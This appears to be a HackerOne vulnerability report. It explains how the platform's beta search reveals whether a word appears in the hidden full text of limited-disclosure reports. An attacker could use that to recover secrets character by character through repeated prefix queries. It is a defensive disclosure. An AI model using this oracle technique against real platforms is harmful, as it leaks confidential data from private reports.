Similar to https://hackerone.com/reports/685909
An attacker can search for words in limited disclosure reports, and see if it exists in the full report. HackerOne will return whether the word exists in the full report, rather than in the limited part (e.g. summary/title …) of the report
Have the new beta search feature enabled:
addProjectV2ItemById AND reporter:("ahacker1")
(This phrase is only the full report, not in the limited disclosure report)
For example, if there is a secret inside the full report (but not inside the limited portion), the attacker could leak it with a lot of tries.
Suppose secret starts with PREFIX_
then attacker could search for:
PREFIX_a
PREFIX_b
…
until it matches in the report
PREFIX_k
then the attacker could continue
searching for
PREFIX_ka
PREFIX_kb
PREFIX_kc
…
until a match
PREFIX_ko
This could be continued on until the attacker hits the end of the secret, therefore leaking the secrets.
The number of tries would take around:
around 30 chars to try in each iteration * 40 (average length of a secret)
= 1200 tries